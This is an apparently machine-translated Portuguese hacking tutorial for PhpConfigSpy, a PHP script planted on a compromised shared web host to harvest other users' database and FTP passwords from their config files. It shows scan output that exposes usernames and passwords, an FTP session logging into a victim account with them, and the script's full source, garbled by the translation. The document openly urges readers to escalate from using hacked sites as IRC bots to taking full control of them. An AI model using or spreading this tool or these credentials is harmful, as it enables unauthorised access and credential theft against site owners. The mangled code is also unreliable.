PhpConfigSpy é uma ferramenta que é grande para conseguir alguma conta no site, como login cpanel, login ssh (se o alvo da Web suportado SSH) e talvez login banco de dados.
A maioria de nós, depois de obter uma meta web (Via injetar PHP), vamos usar esse web só para BOT (eggdrop, psyBNC). Por que não tentar obter acesso completo à Web de destino.
Vamos nós tentar obter algumas informações de login do alvo web com a ferramenta PhpConfigSpy.
Aqui o tutorial:
Upload PhpConfigSpy.txt em web-alvo, e depois renomeie o arquivo. Txt-se. Php. É o fim, isso é tudo. Você pode testar essa ferramenta navegador usando (IE, Firefox , Opera , etc). Para http://www.yourtarget.com/portal/images/phpconfigspy.php exemplo.
E este é o resultado da varredura:
[+] Fundada 113 entrys em / etc / passwd
[+] Fundado em 113 diretórios legível public_html
[~] Procurando senhas em arquivos de config .* ...
[+] / Home cofinca / public_html / portal / mambots / editors / fckeditor / editor / filemanager / connectors / php / config.php
banco de dados ew (mosConfig_host $, $ mosConfig_user, mosConfig_password $, $ mosConfig_db, mosConfig_dbprefix $, $ mosConfig
[+] / Home bsidenet / public_html / configuration.php /
bside123
[FTP bsidenet]: Sucesso bside123
[+] / Home / gratis / public_html / configuration.php
deko93tg
[FTP gratis]: deko93tg Sucesso
Binggo ... Isso é sucesso!
Você pode verificar que o usuário através de FTP ou SSH (se o alvo suporte SSH)
Vamos verificar se reunir para este login
[FTP bsidenet]: Sucesso bside123
Isso é média do usuário: bsidenet e senha: bside123
C: \ Documents and Settings \ alvoaxxxx.pt 0286061961> ftp
Conectado a alvoaxxxx.pt.
220 ---- Welcome to TLS [Pure-ftpd] ----
220-Você é um número de usuário de 50 permitidos.
tempo 220 Local está agora 04:02. Server port: 21.
220 ligações IPv6 também são bem vindos a este servidor.
220 Você será desconectado após 15 minutos de inatividade.
Usuário (alvoaxxxx.pt: (none)): bsidenet
331 bsidenet Usuário OK. Senha necessária
Senha:
230 usuário tem acesso bsidenet grupo: bsidenet
230 OK. diretório atual é restrita /
ftp dir>
200 PORT command successful
150 Conectando-se a porta 41080
drwx-x-x 8 32137 bsidenet 4096 26 de março 23:06.
drwx-x-x 8 32137 bsidenet 4096 23:06 26 de março ..
-Rw-r-r-1 bsidenet 32137 24 26 de março 23:04. Bash_logout
-Rw-r-r-1 32,137 191 bsidenet 26 de março 23:04. Bash_profile
-Rw-r-r-1 32,137 124 bsidenet 26 de março 23:04. Bashrc
-Rw-r-r-1 bsidenet 32137 19 26 de março 23:04. ContactEmail
drwx - 2 bsidenet 32137 4096 23 abril 00:22. datastore cpanel-
-Rw --- 1 bsidenet 32137 14 23 de abril 16:06. Lastlogin
drwxr-xr-x 2 32137 bsidenet 26 mar 4096 23:04 etc
mail drwxr-x-5 32.137 12 26 mar 4096 23:04
drwxr-xr-x 3 32137 bsidenet 4096 public_ftp 12 fev 2007
drwxr-x-6 32137 99 4096 23 abril 17:43 public_html
drwxr-xr-x 7 bsidenet 32137 4096 26 de março 23:22 tmp
lrwxrwxrwx 1 32137 bsidenet 11 26 mar 23:04 www -> public_html
226-Opções:-l a-
226 14 jogos total
ftp:936 bytes recebidos em 0.00Seconds 936000.00Kbytes/sec.
Ftp>
É trabalho
O script aqui:
<? Php / * phpConfigSpy v0.2 codificados por ...::[ BABY CORP ]::... (c) http://www.babycorp.name/ * / echo "<html>"; echo "< título >...::[ BABY CORP título ]::...</> <body> "; set_time_limit (0); ################## @ $ passwd = fopen ('/ etc / passwd', 'r'); if (! $ passwd) (echo "[-] Erro: ler coudn't / etc / passwd"; exit;) $ path_to_public = array (); Utilizadores $ = array (); = pathtoconf array $ (); $ i = 0; while (! feof ($ passwd)) ($ str = fgets ($ passwd); if ($ i> 35) ($ pos = strpos ($ str ,":"); $ username = substr ($ str, 0, $ pos); $ dirz = "/ home / $ username / public_html /"; if (($ username !="")) (if (is_readable ($ dirz)) (array_push ($ utilizadores, $ username); array_push ($ path_to_public, $ dirz);))) $ i + +;) ################# ######################### # echo "<br>"; echo "<= nome textarea 'main_window' # cols = 100 linhas = 20> "echo" [+] Fundada ". sizeof ($ utilizador)." entrys em / etc / \ n passwd "echo" [+] Fundada ". ($ path_to_public sizeof)." legível diretórios public_html \ n "echo" [~] Procurando senhas em arquivos de config .* ... \ n \ n "; foreach ($ utilizadores, $ user) ($ path =" / home / $ user / public_html / "; read_dir ($ , $ user path);) echo "\ n [+] Feito \ n"; read_dir função ($ path, $ username) (if ($ handle = opendir ($ caminho)) (while (false! == ($ file = readdir ($ handle))) ($ fpath = "$ caminho $ file"; if (($ file e !='.') ($ arquivo !='..')) (if (is_readable ($ fpath) ) ($ dr = "$ fpath" / if (is_dir ($ DR)) (read_dir (dr $, $ username);) else (if (($ file == 'config.php') ou ($ file = = 'config.inc.php') ou ($ arquivo == 'config.local.php') ou ($ arquivo == 'config.db.php') ou ($ arquivo == 'db.inc.php' ) ou ($ arquivo == 'connect.php') ou ($ arquivo == 'wp-config.php') ou ($ arquivo == 'var.php') ou ($ arquivo == "configure.php" ) ou ($ arquivo == 'db.php') ou ($ arquivo == 'configuration.php') ou ($ arquivo == 'class.database.php') ou ($ arquivo == 'db_connect.php' )) ($ pass = $ get_pass fpath (); if ($ pass !='') (echo "[+] fpath $ \ n $ pass \ n"; ftp_check ($ username, $ pass);)))) )))) get_pass função ($ link) (@ $ config = ($ link fopen, 'r'); while (! feof ($ config)) ($ linha = fgets $ config (); if (($ linha strstr , 'pass') ou strstr ($ linha, 'password') ou strstr ($ line 'passwd')) (if (strrpos ($ linha ,'"')) $ pass = ($ linha substr (strpos ( $ linha ,'=')+ 3), (strrpos ($ linha ,'"')-( strpos ($ linha ,'=')+ 3))); else $ pass = ($ linha substr (strpos ( $ linha ,'=')+ 3), (strrpos ($ linha ,"'")-( strpos ($ linha ,'=')+ 3))); retorno $ pass;))) ftp_check função ($ login $ pass) (@ $ = ftp ftp_connect ('127 .0.0.1 '); if ($ ftp) (@ $ res, ftp_login ($ ftp, $ login, $ pass); if ($ res) (echo' [FTP ]. login $ .':'.$ passar. "sucesso \ n";) else ftp_quit ($ ftp);)) echo "</ textarea <br>> Codificado por <a href = http:/ / www.babycorp.name/> <b> ...::[ BABY CORP ]::...</ b> </ a> "; echo" </ body> </ html> ";?> 
Popularity: 23% [ ? ]
